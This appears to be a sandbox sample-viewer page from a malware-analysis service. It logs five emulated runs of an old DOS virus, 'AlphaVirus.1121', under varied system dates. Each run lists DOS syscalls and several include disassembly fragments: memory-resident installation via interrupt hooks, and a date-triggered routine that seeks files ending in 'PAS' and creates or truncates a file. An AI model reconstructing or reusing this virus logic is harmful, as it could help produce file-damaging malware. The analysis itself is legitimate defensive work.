Sample viewer

vx.netlux.org/Virus.DOS.AlphaVirus.1121

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:16:18.186293713Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:16:18.188307148Z 42 PC: 13493 | Get date 0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-17T23:16:18.19112843Z 98 PC: 1349c | Get current PSP
2018-12-17T23:16:18.19214425Z 74 PC: 134af | Reallocate memory
2018-12-17T23:16:18.194370945Z 72 PC: 134b6 | Allocate memory
2018-12-17T23:16:18.196171018Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:16:18.197429904Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-17T23:16:18.203019601Z 48 PC: 12a8f | Get DOS version
2018-12-17T23:16:18.204593098Z 42 PC: 9f13e | Get date 0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-17T23:16:18.206749882Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T23:16:18.21333012Z 93 PC: 12afe | File sharing functions
2018-12-17T23:16:18.216832955Z 9 PC: 12a86 | Display string (String= 'Size change=0469h/01129d. ')
2018-12-17T23:16:18.221018141Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:26.963353201Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:26.965031607Z 42 PC: 13493 | Get date 0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:26.968745842Z 98 PC: 1349c | Get current PSP
2018-12-25T12:56:26.969775291Z 74 PC: 134af | Reallocate memory
2018-12-25T12:56:26.97135856Z 72 PC: 134b6 | Allocate memory
2018-12-25T12:56:26.973731727Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:26.975460056Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:26.982767274Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:26.988350228Z 42 PC: 9f13e | Get date 0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-25T12:56:26.991149691Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:26.999112753Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:27.002614376Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:27.007126039Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:29.431553413Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:29.434016579Z 42 PC: 13493 | Get date 0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:29.440611029Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:29.444970478Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:29.446626416Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:29.451472712Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:29.453384392Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:29.458683264Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:29.502251002Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:29.504496053Z 42 PC: 13493 | Get date 0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:29.507306545Z 98 PC: 1349c | Get current PSP
2018-12-25T12:56:29.508581705Z 74 PC: 134af | Reallocate memory
2018-12-25T12:56:29.51123743Z 72 PC: 134b6 | Allocate memory
2018-12-25T12:56:29.513558065Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:29.515249984Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:29.522853517Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:29.52534962Z 42 PC: 9f13e | Get date 0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-25T12:56:29.527931727Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:29.535425305Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:29.539015121Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:29.544100006Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17701,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:30.569118152Z 53 PC: 1347e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:30.571706877Z 42 PC: 13493 | Get date 0x13493: cmp dh, 0xa
0x13496: je 0x134d5
0x13498: mov ah, 0x62
0x1349a: int 0x21
0x1349c: dec bx
0x1349d: mov es, bx
0x1349f: mov ax, word ptr es:[3]
0x134a3: sub ax, 0xd6
0x134a6: inc bx
0x134a7: mov es, bx
0x134a9: mov bx, ax
0x134ab: mov ah, 0x4a
0x134ad: int 0x21
0x134af: mov bx, 0xd4
0x134b2: mov ah, 0x48
0x134b4: int 0x21
0x134b6: mov es, ax
0x134b8: mov si, 0
0x134bb: mov di, si
0x134bd: mov cx, 0x465
2018-12-25T12:56:30.574692633Z 98 PC: 1349c | Get current PSP
2018-12-25T12:56:30.576097726Z 74 PC: 134af | Reallocate memory
2018-12-25T12:56:30.578040354Z 72 PC: 134b6 | Allocate memory
2018-12-25T12:56:30.580727244Z 37 PC: 134d5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:30.582430314Z 9 PC: 12a86 | Display string (String= ' ��⮢,�p�� ��ᬮ�p�� ����� �� �� ᬮ���� ����⠭����� ᢮�� �p��� Adinfo�. Press any key ... ')
2018-12-25T12:56:30.588904642Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:56:30.591366598Z 42 PC: 9f13e | Get date 0x9f13e: cmp dl, 0x15
0x9f141: jne 0x9f17c
0x9f143: inc si
0x9f144: cmp byte ptr [si], 0
0x9f147: loopne 0x9f143
0x9f149: sub si, 3
0x9f14c: mov al, 0x50
0x9f14e: cmp byte ptr [si], al
0x9f150: jne 0x9f17c
0x9f152: mov al, 0x41
0x9f154: cmp byte ptr [si + 1], al
0x9f157: jne 0x9f17c
0x9f159: mov al, 0x53
0x9f15b: cmp byte ptr [si + 2], al
0x9f15e: jne 0x9f17c
0x9f160: mov ah, 0x3c
0x9f162: mov cx, 0
0x9f165: int 0x21
0x9f167: mov bx, ax
0x9f169: mov ax, cs
2018-12-25T12:56:30.5940385Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:56:30.601968499Z 93 PC: 12afe | File sharing functions
2018-12-25T12:56:30.605460951Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:56:30.610628458Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')